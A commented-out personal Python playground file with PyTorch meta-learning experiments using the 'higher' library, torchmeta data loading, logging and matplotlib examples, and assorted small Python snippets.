# x += 1 # not allowed because x is a leaf, since changing the value of a leaf with an inplace forgets it's value then backward wouldn't work IMO (though its not the official response)
# print(f'x.is_leaf = {x.is_leaf}')
#
#
# def copy_initial_weights_playground_original():
# import torch
# import torch.nn as nn
# import torch.optim as optim
# import higher
# import numpy as np
#
# np.random.seed(1)
# torch.manual_seed(3)
# N = 100
# actual_multiplier = 3.5
# meta_lr = 0.00001
# loops = 5 # how many iterations in the inner loop we want to do
#
# x = torch.tensor(np.random.random((N, 1)), dtype=torch.float64) # features for inner training loop
# y = x * actual_multiplier # target for inner training loop
# model = nn.Linear(1, 1, bias=False).double() # simplest possible model - multiple input x by weight w without bias
# meta_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
#
# def run_inner_loop_once(model, verbose, copy_initial_weights):
# lr_tensor = torch.tensor([0.3], requires_grad=True)
# momentum_tensor = torch.tensor([0.5], requires_grad=True)
# opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
# with higher.innerloop_ctx(model, opt, copy_initial_weights=copy_initial_weights,
# override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
# for j in range(loops):
# if verbose:
# print('Starting inner loop step j=={0}'.format(j))
# print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
# list(fmodel.parameters(time=j)))))
# print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
# list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
# out = fmodel(x)
# if verbose:
# print(
# ' Notice how `out` is `x` multiplied by the latest version of weight: {0:.4} * {1:.4} == {2:.4}'.format(
# x[0, 0].item(), list(fmodel.parameters())[0].item(), out[0].item()))
# loss = ((out - y) ** 2).mean()
# diffopt.step(loss)
#
# if verbose:
# # after all inner training let's see all steps' parameter tensors
# print()
# print("Let's print all intermediate parameters versions after inner loop is done:")
# for j in range(loops + 1):
# print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
# print()
#
# # let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
# weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
# meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
# print(' Final meta-loss: {0}'.format(meta_loss.item()))
# meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
# if verbose:
# print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
# momentum_tensor.grad))
# print(
# ' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
# return meta_loss.item()
#
# print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
# meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
# meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
# final_meta_gradient = list(model.parameters())[0].grad.item()
# # Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# # a bunch of hand-wavy statements and difficult to read code.
# # We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
# meta_opt.step()
# meta_opt.zero_grad()
# meta_step = - meta_lr * final_meta_gradient # how much meta_opt actually shifted inital weight value
# meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
#
#
# def copy_initial_weights_playground():
# import torch
# import torch.nn as nn
# import torch.optim as optim
# import higher
# import numpy as np
#
# np.random.seed(1)
# torch.manual_seed(3)
# N = 100
# actual_multiplier = 3.5 # the parameters we want the model to learn
# meta_lr = 0.00001
# loops = 5 # how many iterations in the inner loop we want to do
#
# x = torch.randn(N, 1) # features for inner training loop
# y = x * actual_multiplier # target for inner training loop
# model = nn.Linear(1, 1,
# bias=False) # model(x) = w*x, simplest possible model - multiple input x by weight w without bias. goal is to w~~actualy_multiplier
# outer_opt = optim.SGD(model.parameters(), lr=meta_lr, momentum=0.)
#
# def run_inner_loop_once(model, verbose, copy_initial_weights):
# lr_tensor = torch.tensor([0.3], requires_grad=True)
# momentum_tensor = torch.tensor([0.5], requires_grad=True)
# inner_opt = optim.SGD(model.parameters(), lr=0.3, momentum=0.5)
# with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=copy_initial_weights,
# override={'lr': lr_tensor, 'momentum': momentum_tensor}) as (fmodel, diffopt):
# for j in range(loops):
# if verbose:
# print('Starting inner loop step j=={0}'.format(j))
# print(' Representation of fmodel.parameters(time={0}): {1}'.format(j, str(
# list(fmodel.parameters(time=j)))))
# print(' Notice that fmodel.parameters() is same as fmodel.parameters(time={0}): {1}'.format(j, (
# list(fmodel.parameters())[0] is list(fmodel.parameters(time=j))[0])))
# out = fmodel(x)
# if verbose:
# print(
# f' Notice how `out` is `x` multiplied by the latest version of weight: {x[0, 0].item()} * {list(fmodel.parameters())[0].item()} == {out[0].item()}')
# loss = ((out - y) ** 2).mean()
# diffopt.step(loss)
#
# if verbose:
# # after all inner training let's see all steps' parameter tensors
# print()
# print("Let's print all intermediate parameters versions after inner loop is done:")
# for j in range(loops + 1):
# print(' For j=={0} parameter is: {1}'.format(j, str(list(fmodel.parameters(time=j)))))
# print()
#
# # let's imagine now that our meta-learning optimization is trying to check how far we got in the end from the actual_multiplier
# weight_learned_after_full_inner_loop = list(fmodel.parameters())[0]
# meta_loss = (weight_learned_after_full_inner_loop - actual_multiplier) ** 2
# print(' Final meta-loss: {0}'.format(meta_loss.item()))
# meta_loss.backward() # will only propagate gradient to original model parameter's `grad` if copy_initial_weight=False
# if verbose:
# print(' Gradient of final loss we got for lr and momentum: {0} and {1}'.format(lr_tensor.grad,
# momentum_tensor.grad))
# print(
# ' If you change number of iterations "loops" to much larger number final loss will be stable and the values above will be smaller')
# return meta_loss.item()
#
# print('=================== Run Inner Loop First Time (copy_initial_weights=True) =================\n')
# meta_loss_val1 = run_inner_loop_once(model, verbose=True, copy_initial_weights=True)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Second Time (copy_initial_weights=False) =================\n')
# meta_loss_val2 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
# print("\nLet's see if we got any gradient for initial model parameters: {0}\n".format(
# list(model.parameters())[0].grad))
#
# print('=================== Run Inner Loop Third Time (copy_initial_weights=False) =================\n')
# final_meta_gradient = list(model.parameters())[0].grad.item()
# # Now let's double-check `higher` library is actually doing what it promised to do, not just giving us
# # a bunch of hand-wavy statements and difficult to read code.
# # We will do a simple SGD step using meta_opt changing initial weight for the training and see how meta loss changed
# outer_opt.step()
# outer_opt.zero_grad()
# meta_step = - meta_lr * final_meta_gradient # how much meta_opt actually shifted inital weight value
# meta_loss_val3 = run_inner_loop_once(model, verbose=False, copy_initial_weights=False)
#
# meta_loss_gradient_approximation = (meta_loss_val3 - meta_loss_val2) / meta_step
#
# print()
# print(
# 'Side-by-side meta_loss_gradient_approximation and gradient computed by `higher` lib: {0:.4} VS {1:.4}'.format(
# meta_loss_gradient_approximation, final_meta_gradient))
#
#
# def tqdm_torchmeta():
# from torchvision.transforms import Compose, Resize, ToTensor
#
# import torchmeta
# from torchmeta.datasets.helpers import miniimagenet
#
# from pathlib import Path
# from types import SimpleNamespace
#
# from tqdm import tqdm
#
# ## get args
# args = SimpleNamespace(episodes=5, n_classes=5, k_shot=5, k_eval=15, meta_batch_size=1, n_workers=4)
# args.data_root = Path("~/automl-meta-learning/data/miniImagenet").expanduser()
#
# ## get meta-batch loader
# train_transform = Compose([Resize(84), ToTensor()])
# dataset = miniimagenet(
# args.data_root,
# ways=args.n_classes,
# shots=args.k_shot,
# test_shots=args.k_eval,
# meta_split='train',
# download=False)
# dataloader = torchmeta.utils.data.BatchMetaDataLoader(
# dataset,
# batch_size=args.meta_batch_size,
# num_workers=args.n_workers)
#
# with tqdm(dataset):
# print(f'len(dataloader)= {len(dataloader)}')
# for episode, batch in enumerate(dataloader):
# print(f'episode = {episode}')
# train_inputs, train_labels = batch["train"]
# print(f'train_labels[0] = {train_labels[0]}')
# print(f'train_inputs.size() = {train_inputs.size()}')
# pass
# if episode >= args.episodes:
# break
#
#
# # if __name__ == "__main__":
# # start = time.time()
# # print('pytorch playground!')
# # # params_in_comp_graph()
# # # check_if_tensor_is_detached()
# # # deep_copy_issue()
# # # download_mini_imagenet()
# # # extract()
# # # download_and_extract_miniImagenet(root='~/tmp')
# # # download_and_extract_miniImagenet(root='~/automl-meta-learning/data')
# # # torch_concat()
# # # detach_vs_cloe()
# # # error_unexpected_way_to_by_pass_safety()
# # # clone_playground()
# # # inplace_playground()
# # # clone_vs_deepcopy()
# # # copy_initial_weights_playground()
# # tqdm_torchmeta()
# # print('--> DONE')
# # time_passed_msg, _, _, _ = report_times(start)
# # print(f'--> {time_passed_msg}')
#
# # %%
#
# import sys
#
# print(sys.version) ##
# print(sys.path)
#
#
# def helloworld():
# print('helloworld')
# print('hello12345')
#
#
# def union_dicts():
# d1 = {'x': 1}
# d2 = {'y': 2, 'z': 3}
# d_union = {**d1, **d2}
# print(d_union)
#
#
# def get_stdout_old():
# import sys
#
# # contents = ""
# # #with open('some_file.txt') as f:
# # #with open(sys.stdout,'r') as f:
# # # sys.stdout.mode = 'r'
# # for line in sys.stdout.readlines():
# # contents += line
# # print(contents)
#
# # print(sys.stdout)
# # with open(sys.stdout.buffer) as f:
# # print(f.readline())
#
# # import subprocess
#
# # p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# # stdout = []
# # while True:
# # line = p.stdout.readline()
# # stdout.append(line)
# # print( line )
# # if line == '' and p.poll() != None:
# # break
# # print( ''.join(stdout) )
#
# import sys
# myfile = "input.txt"
#
# def print(*args):
# __builtins__.print(*args, file=sys.__stdout__)
# with open(myfile, "a+") as f:
# __builtins__.print(*args, file=f)
#
# print('a')
# print('b')
# print('c')
#
# repr(sys.stdout)
#
#
# def get_stdout():
# import sys
# myfile = "my_stdout.txt"
#
# # redefine print
# def print(*args):
# __builtins__.print(*args, file=sys.__stdout__) # prints to terminal
# with open(myfile, "a+") as f:
# __builtins__.print(*args, file=f) # saves in a file
#
# print('a')
# print('b')
# print('c')
#
#
# def logging_basic():
# import logging
# logging.warning('Watch out!') # will print a message to the console
# logging.info('I told you so') # will not print anything
#
#
# def logging_to_file():
# import logging
# logging.basicConfig(filename='example.log', level=logging.DEBUG)
# # logging.
# logging.debug('This message should go to the log file')
# logging.info('So should this')
# logging.warning('And this, too')
#
#
# def logging_to_file_INFO_LEVEL():
# import logging
# import sys
# format = '{asctime}:{levelname}:{name}:lineno {lineno}:{message}'
# logging.basicConfig(filename='example.log', level=logging.INFO, format=format, style='{')
# # logging.basicConfig(stream=sys.stdout,level=logging.INFO,format=format,style='{')
# # logging.
# logging.debug('This message should NOT go to the log file')
# logging.info('This message should go to log file')
# logging.warning('This, too')
#
#
# def logger_SO_print_and_write_to_my_stdout():
# """My sample logger code to print to screen and write to file (the same thing).
#
# Note: trying to replace this old answer of mine using a logger:
# - https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
#
# Credit:
# - https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
# - https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
# - https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
#
# Other resources:
# - https://docs.python-guide.org/writing/logging/
# - https://docs.python.org/3/howto/logging.html#logging-basic-tutorial
# - https://stackoverflow.com/questions/61084916/how-does-one-make-an-already-opened-file-readable-e-g-sys-stdout/61255375#61255375
# """
# from pathlib import Path
# import logging
# import os
# import sys
# from datetime import datetime
#
# ## create directory (& its parents) if it does not exist otherwise do nothing :)
# # get current time
# current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# logs_dirpath = Path(f'~/logs/python_playground_logs_{current_time}/').expanduser()
# logs_dirpath.mkdir(parents=True, exist_ok=True)
# my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# # remove my_stdout if it exists (note you can also just create a new log dir/file each time or append to the end of the log file your using)
# # os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
#
# ## create top logger
# logger = logging.getLogger(
# __name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
# logger.setLevel(
# logging.DEBUG) # note: use logging.DEBUG, CAREFUL with logging.UNSET: https://stackoverflow.com/questions/21494468/about-notset-in-python-logging/21494716#21494716
#
# ## log to my_stdout.log file
# file_handler = logging.FileHandler(filename=my_stdout_filename)
# # file_handler.setLevel(logging.INFO) # not setting it means it inherits the logger. It will log everything from DEBUG upwards in severity to this handler.
# log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
# file_handler.setFormatter(fmt=formatter)
#
# ## log to stdout/screen
# stdout_stream_handler = logging.StreamHandler(
# stream=sys.stdout) # default stderr, though not sure the advatages of logging to one or the other
# # stdout_stream_handler.setLevel(logging.INFO) # Note: having different set levels means that we can route using a threshold what gets logged to this handler
# log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{') # set the logging format at for this handler
# stdout_stream_handler.setFormatter(fmt=formatter)
#
# logger.addHandler(hdlr=file_handler) # add this file handler to top logger
# logger.addHandler(hdlr=stdout_stream_handler) # add this file handler to top logger
#
# logger.log(logging.NOTSET, 'notset')
# logger.debug('debug')
# logger.info('info')
# logger.warning('warning')
# logger.error('error')
# logger.critical('critical')
#
#
# def logging_unset_level():
# """My sample logger explaining UNSET level
#
# Resources:
# - https://stackoverflow.com/questions/21494468/about-notset-in-python-logging
# - https://www.youtube.com/watch?v=jxmzY9soFXg&t=468s
# - https://github.com/CoreyMSchafer/code_snippets/tree/master/Logging-Advanced
# """
# import logging
#
# logger = logging.getLogger(
# __name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
# print(f'DEFAULT VALUE: logger.level = {logger.level}')
#
# file_handler = logging.FileHandler(filename='my_log.log')
# log_format = "{asctime}:{levelname}:{lineno}:{name}:{message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{')
# file_handler.setFormatter(fmt=formatter)
#
# stdout_stream_handler = logging.StreamHandler(stream=sys.stdout)
# stdout_stream_handler.setLevel(logging.INFO)
# log_format = "{name}:{levelname}:-> {message}" # see for logrecord attributes https://docs.python.org/3/library/logging.html#logrecord-attributes
# formatter = logging.Formatter(fmt=log_format, style='{')
# stdout_stream_handler.setFormatter(fmt=formatter)
#
# logger.addHandler(hdlr=file_handler)
# logger.addHandler(hdlr=stdout_stream_handler)
#
# logger.log(logging.NOTSET, 'notset')
# logger.debug('debug')
# logger.info('info')
# logger.warning('warning')
# logger.error('error')
# logger.critical('critical')
#
#
# def logger():
# from pathlib import Path
# import logging
#
# # create directory (& its parents) if it does not exist otherwise do nothing :)
# logs_dirpath = Path('~/automl-meta-learning/logs/python_playground_logs/').expanduser()
# logs_dirpath.mkdir(parents=True, exist_ok=True)
# my_stdout_filename = logs_dirpath / Path('my_stdout.log')
# # remove my_stdout if it exists (used to have this but now I decided to create a new log & file each)
# # os.remove(my_stdout_filename) if os.path.isfile(my_stdout_filename) else None
#
# logger = logging.getLogger(
# __name__) # loggers are created in hierarchy using dot notation, thus __name__ ensures no name collisions.
# logger.setLevel(logging.INFO)
#
# log_format = "{asctime}:{levelname}:{name}:{message}"
# formatter = logging.Formatter(fmt=log_format, style='{')
#
# file_handler = logging.FileHandler(filename=my_stdout_filename)
# file_handler.setFormatter(fmt=formatter)
#
# logger.addHandler(hdlr=file_handler)
# logger.addHandler(hdlr=logging.StreamHandler())
#
# for i in range(3):
# logger.info(f'i = {i}')
#
# logger.info(f'logger DONE')
#
#
# def logging_example_from_youtube():
# """https://github.com/CoreyMSchafer/code_snippets/blob/master/Logging-Advanced/employee.py
# """
# import logging
# import pytorch_playground # has employee class & code
# import sys
#
# logger = logging.getLogger(__name__)
# logger.setLevel(logging.DEBUG)
#
# formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s:%(message)s')
#
# file_handler = logging.FileHandler('sample.log')
# file_handler.setLevel(logging.ERROR)
# file_handler.setFormatter(formatter)
#
# stream_handler = logging.StreamHandler()
# stream_handler.setFormatter(formatter)
#
# logger.addHandler(file_handler)
# logger.addHandler(stream_handler)
#
# logger.critical('not really critical :P')
#
# def add(x, y):
# """Add Function"""
# return x + y
#
# def subtract(x, y):
# """Subtract Function"""
# return x - y
#
# def multiply(x, y):
# """Multiply Function"""
# return x * y
#
# def divide(x, y):
# """Divide Function"""
# try:
# result = x / y
# except ZeroDivisionError:
# logger.exception('Tried to divide by zero')
# else:
# return result
#
# logger.info(
# 'testing if log info is going to print to screen. it should because everything with debug or above is printed since that stream has that level.')
#
# num_1 = 10
# num_2 = 0
#
# add_result = add(num_1, num_2)
# logger.debug('Add: {} + {} = {}'.format(num_1, num_2, add_result))
#
# sub_result = subtract(num_1, num_2)
# logger.debug('Sub: {} - {} = {}'.format(num_1, num_2, sub_result))
#
# mul_result = multiply(num_1, num_2)
# logger.debug('Mul: {} * {} = {}'.format(num_1, num_2, mul_result))
#
# div_result = divide(num_1, num_2)
# logger.debug('Div: {} / {} = {}'.format(num_1, num_2, div_result))
#
#
# def plot():
# """
# source:
# - https://www.youtube.com/watch?v=UO98lJQ3QGI
# - https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/01-Introduction/finished_code.py
# """
# from matplotlib import my_pyplot as plt
#
# plt.xkcd()
#
# ages_x = [18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35,
# 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55]
#
# py_dev_y = [20046, 17100, 20000, 24744, 30500, 37732, 41247, 45372, 48876, 53850, 57287, 63016, 65998, 70003, 70000,
# 71496, 75370, 83640, 84666,
# 84392, 78254, 85000, 87038, 91991, 100000, 94796, 97962, 93302, 99240, 102736, 112285, 100771, 104708,
# 108423, 101407, 112542, 122870, 120000]
# plt.plot(ages_x, py_dev_y, label='Python')
#
# js_dev_y = [16446, 16791, 18942, 21780, 25704, 29000, 34372, 37810, 43515, 46823, 49293, 53437, 56373, 62375, 66674,
# 68745, 68746, 74583, 79000,
# 78508, 79996, 80403, 83820, 88833, 91660, 87892, 96243, 90000, 99313, 91660, 102264, 100000, 100000,
# 91660, 99240, 108000, 105000, 104000]
# plt.plot(ages_x, js_dev_y, label='JavaScript')
#
# dev_y = [17784, 16500, 18012, 20628, 25206, 30252, 34368, 38496, 42000, 46752, 49320, 53200, 56000, 62316, 64928,
# 67317, 68748, 73752, 77232,
# 78000, 78508, 79536, 82488, 88935, 90000, 90056, 95000, 90000, 91633, 91660, 98150, 98964, 100000, 98988,
# 100000, 108923, 105000, 103117]
# plt.plot(ages_x, dev_y, color='#444444', linestyle='--', label='All Devs')
#
# plt.xlabel('Ages')
# plt.ylabel('Median Salary (USD)')
# plt.title('Median Salary (USD) by Age')
#
# plt.legend()
#
# plt.tight_layout()
#
# plt.savefig('plot.png')
#
# plt.show()
#
#
# def subplot():
# """https://github.com/CoreyMSchafer/code_snippets/blob/master/Python/Matplotlib/10-Subplots/finished_code.py
# """
#
# import pandas as pd
# from matplotlib import my_pyplot as plt
#
# plt.style.use('seaborn')
#
# data = read_csv('data.csv')
# ages = data['Age']
# dev_salaries = data['All_Devs']
# py_salaries = data['Python']
# js_salaries = data['JavaScript']
#
# fig1, ax1 = plt.subplots()
# fig2, ax2 = plt.subplots()
#
# ax1.plot(ages, dev_salaries, color='#444444',
# linestyle='--', label='All Devs')
#
# ax2.plot(ages, py_salaries, label='Python')
# ax2.plot(ages, js_salaries, label='JavaScript')
#
# ax1.legend()
# ax1.set_title('Median Salary (USD) by Age')
# ax1.set_ylabel('Median Salary (USD)')
#
# ax2.legend()
# ax2.set_xlabel('Ages')
# ax2.set_ylabel('Median Salary (USD)')
#
# plt.tight_layout()
#
# plt.show()
#
# fig1.savefig('fig1.png')
# fig2.savefig('fig2.png')
#
#
# def import_utils_test():
# import uutils
# import uutils.utils as utils
# from uutils.utils import logger
#
# print(uutils)
# print(utils)
# print(logger)
#
# print()
#
#
# def sys_path():
# """
#
# python -c "import sys; print(sys.path)”
#
# python -c "import sys; [print(p) for p in sys.path]"
# """
# import sys
#
# def path():
# import sys
# [print(p) for p in sys.path]
#
# for path in sys.path:
# print(path)
#
#
# def pycharm_playground():
# import tqdm
#
# print('running pycharm playground...')
#
# b = 0
# print(b)
# print('Intermediate print line')
# print(b)
# print(b)
# print('Done!')
#
#
# if __name__ == '__main__':
# # union_dicts()
# # get_stdout()
# # logger()
# # logger_SO_print_and_write_to_my_stdout()
# # logging_basic()
# # logging_to_file()
# # logging_to_file()
# # logging_to_file_INFO_LEVEL()
# # logging_example_from_youtube()
# # logging_unset_level()
# # import_utils_test()
# pycharm_playground()
# print('\n---> DONE\a\n\n') ## HIii
#
# # %%
#
# import sys
#
# print(sys.version)
#
# # %%
#
# ## dictionary comprehension looping
#
# d = {'a': 0, 'b': 1}
# lst1 = [f'key:{k}' for k in d]
# lst2 = [f'key:{k}, value:{v}' for k, v in d.items()]
#
# print(lst1)
# print(lst2)
#
# # %%
#
# ## merging two dictionaries
#
# d1 = {'a': 0, 'b': 1}
# d2 = {'c': 2, 'd': 3}
# d3 = {'e': 4, 'f': 5, 'g': 6}
# d = {**d1, **d2, **d3}
#
# print(d)
#
# # %%
#
#
# from collections import OrderedDict
#
# od = OrderedDict([
# ('first', 1)
# ])
#
# print(od)
# od['first'] = 2
# print(od)
#
# lst = sum([i for i in range(3)])
# print(lst)
# od3 = OrderedDict([(i, i) for i in range(3)])
# print(od3)
# print(3 + float('Inf'))
#
# # %%
#
# # import pathlib
# # from pathlib import Path
# #
# #
# # def make_dirpath_current_datetime_hostname(path=None, comment='', replace_dots=True):
# # '''
# # make dir string: runs/CURRENT_DATETIME_HOSTNAME
# # '''
# # import socket
# # import os
# # from datetime import datetime
# # # check if root is a PosixPath object
# # if type(path) != pathlib.PosixPath and path is not None:
# # path = Path(path)
# # current_time = datetime.now().strftime('%b%d_%H-%M-%S')
# # log_dir = os.path.join('runs', current_time + '_' + socket.gethostname() + comment)
# # log_dir = Path(log_dir)
# # print(log_dir._str)
# # if replace_dots:
# # log_dir = Path(log_dir._str.replace('.', '_'))
# # if path is not None:
# # log_dir = path / log_dir
# # return log_dir
# #
# #
# # print(type(Path('~')) == pathlib.PosixPath)
# # print()
# #
# # log_dir = make_dirpath_current_datetime_hostname()
# # print(log_dir)
# # log_dir = make_dirpath_current_datetime_hostname('~')
# # print(log_dir)
# # log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter')
# # print(log_dir)
# # log_dir = make_dirpath_current_datetime_hostname('~').expanduser()
# # print(log_dir)
# #
# # string = "geeks for geeks geeks geeks geeks"
# # # Prints the string by replacing geeks by Geeks
# # print(string.replace("geeks", "Geeks"))
# #
# # log_dir = make_dirpath_current_datetime_hostname('~', '_jupyter', True)
# # print(log_dir)
#
# # %%
#
# # adding keys to empty dic
#
# d = {}
# d['a'] = 3
# print(d)
#
# # %%
#
# # unpack list?
#
# (a, b, c) = [1, 2, 3]
# print(a)
#
#
# # %%
#
# ## kwargs
#
# def f(*args, **kwargs):
# print(args)
# print(kwargs)
#
#
# f()
# f(1, 2, 3, a=1, b=2, c=3)
#
# # %%
#
# #
# # import json
# #
# # from pathlib import Path
# #
# # p = Path('~/').expanduser()
# # with open(p) as f:
# # data = json.load(f)
# # print(data)
# # print(data['password'])
#
# # %%
#
# import subprocess
#
# from subprocess import Popen, PIPE, STDOUT
#
# cmd = 'ls /etc/fstab /etc/non-existent-file'
# p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
# output = p.stdout.read()
# print(output)
#
# # %%
#
# import sys
#
# print('a')
#
# print(sys.stdout)
#
# # %%
#
# # from pathlib import Path
# #
# #
# # def send_email(subject, message, destination, password_path=None):
# # """ Send an e-mail from with message to destination email.
# #
# # NOTE: if you get an error with google gmails you might need to do this:
# # https://stackoverflow.com/questions/16512592/login-credentials-not-working-with-gmail-smtp
# # To use an app password:
# # https://stackoverflow.com/questions/60975490/how-does-one-send-an-e-mail-from-python-not-using-gmail
# #
# # Arguments:
# # message {str} -- message string to send.
# # destination {str} -- destination email (as string)
# # """
# # from socket import gethostname
# # from email.message import EmailMessage
# # import smtplib
# # import json
# # import sys
# #
# # server = smtplib.SMTP('smtp.gmail.com', 587)
# # smtplib.stdout = sys.stdout
# # server.starttls()
# # with open(password_path) as f:
# # config = json.load(f)
# # server.login('slurm.miranda@gmail.com', config['password'])
# #
# # # craft message
# # msg = EmailMessage()
# #
# # # message = f'{message}\nSend from Hostname: {gethostname()}'
# # # msg.set_content(message)
# # msg['Subject'] = subject
# # msg['From'] = 'slurm.miranda@gmail.com'
# # msg['To'] = destination
# # # send msg
# # server.send_message(msg)
# #
# #
# # ##
# # print("-------> HELLOWWWWWWWW")
# # p = Path('~/automl-meta-learning/automl/experiments/pw_app.config.json').expanduser()
# # send_email(subject='TEST: send_email2', message='MESSAGE', destination='brando.science@gmail.com', password_path=p)
#
# # %%
#
# """
# Demo of the errorbar function, including upper and lower limits
# """
# import numpy as np
# import matplotlib.my_pyplot as plt
#
# import matplotlib as mpl
#
# mpl.rcParams["errorbar.capsize"] = 3
#
# # https://stackoverflow.com/questions/61415955/why-dont-the-error-limits-in-my-plots-show-in-matplotlib
#
# # example data
# x = np.arange(0.5, 5.5, 0.5)
# y = np.exp(-x)
# xerr = 0.1
# yerr = 0.2
# ls = 'dotted'
#
# fig = plt.figure()
# ax = fig.add_subplot(1, 1, 1)
#
# # standard error bars
# plt.errorbar(x, y, xerr=xerr, yerr=yerr, ls=ls, color='blue')
#
# # including upper limits
# uplims = np.zeros(x.shape)
# uplims[[1, 5, 9]] = True
# plt.errorbar(x, y + 0.5, xerr=xerr, yerr=yerr, uplims=uplims, ls=ls,
# color='green')
#
# # including lower limits
# lolims = np.zeros(x.shape)
# lolims[[2, 4, 8]] = True
# plt.errorbar(x, y + 1.0, xerr=xerr, yerr=yerr, lolims=lolims, ls=ls,
# color='red')
#
# # including upper and lower limits
# plt.errorbar(x, y + 1.5, marker='o', ms=8, xerr=xerr, yerr=yerr,
# lolims=lolims, uplims=uplims, ls=ls, color='magenta')
#
# # including xlower and xupper limits
# xerr = 0.2
# yerr = np.zeros(x.shape) + 0.2
# yerr[[3, 6]] = 0.3
# xlolims = lolims
# xuplims = uplims
# lolims = np.zeros(x.shape)
# uplims = np.zeros(x.shape)
# lolims[[6]] = True
# uplims[[3]] = True
# plt.errorbar(x, y + 2.1, marker='o', ms=8, xerr=xerr, yerr=yerr,
# xlolims=xlolims, xuplims=xuplims, uplims=uplims, lolims=lolims,
# ls='none', mec='blue', capsize=0, color='cyan')
#
# ax.set_xlim((0, 5.5))
# ax.set_title('Errorbar upper and lower limits')
# plt.show()
#
# # %%
#
# from types import SimpleNamespace
# from pathlib import Path
# from pprint import pprint
#
# args = SimpleNamespace()
# args.data_root = "~/automl-meta-learning/data/miniImagenet"
#
# args.data_root = Path(args.data_root).expanduser()
#
# print(args)
#
# # pprint(dir(args.data_root))
# print(args.data_root.name)
# print('miniImagenet' in args.data_root.name)
#
# # %%
#
# ## sampling N classes for len(meta-set)
# # In sampling without replacement, each sample unit of
# # the population has only one chance to be selected in the sample.
# # because you are NOT replacing what you removed.
#
# import random
#
# N = 5
# len_meta_set = 64
# sample = random.sample(range(0, len_meta_set), N)
#
# print(sample)
#
# for i, n in enumerate(sample):
# print(f'i={i}\nn={n}\n')
#
#
# # %%
#
# # iterator https://www.programiz.com/python-programming/iterator
#
# class Counter:
#
# def __init__(self, max=0):
# self.max = max # returns up to and including that number
#
# def __iter__(self):
# self.n = 0
# return self
#
# def __next__(self):
# if self.n <= self.max:
# current_count = self.n
# self.n += 1
# print(f'current_count = {current_count}')
# print(f'self.n = {self.n}')
# print(self.n is current_count)
# return current_count
# else:
# raise StopIteration
#
#
# ## test it
#
# counter = iter(Counter(max=0))
# for count in counter:
# print(f'count = {count}')
#
# # %%
#
# from tqdm import tqdm
#
# print(tqdm)
#
# lst = range(3)
# print(type(lst))
#
# with tqdm(iter(lst), total=5) as tlist:
# print(f'tlist = {type(tlist)}')
# for i in tlist:
# print(i)
#
# # %%
#
# from tqdm import tqdm
#
#
# class Plus2:
#
# def __init__(self, max=0):
# self.max = max # returns up to and including that number
#
# def __iter__(self):
# self.it = 0
# self.tot = 0
# return self
#
# def __next__(self):
# if self.it <= self.max:
# self.it += 1
# self.tot += 2
# return self.tot
# else:
# raise StopIteration
#
# def __len__(self):
# return self.max
#
#
# ##
# counter = iter(Plus2(max=int(100000)))
# with tqdm(counter, total=len(counter)) as tqcounter:
# for idx, pow2 in enumerate(tqcounter):
# print()
# print(f'idx = {idx}')
# print(f'powd2 = {pow2}')
# pass
#
# # %%
#
# from tqdm import tqdm
#
# for i in tqdm(range(int(9e6))):
# pass
#
# # %%
#
# from tqdm import tqdm
#
# import time
#
# with tqdm(range(int(5))) as trange:
# for i in trange:
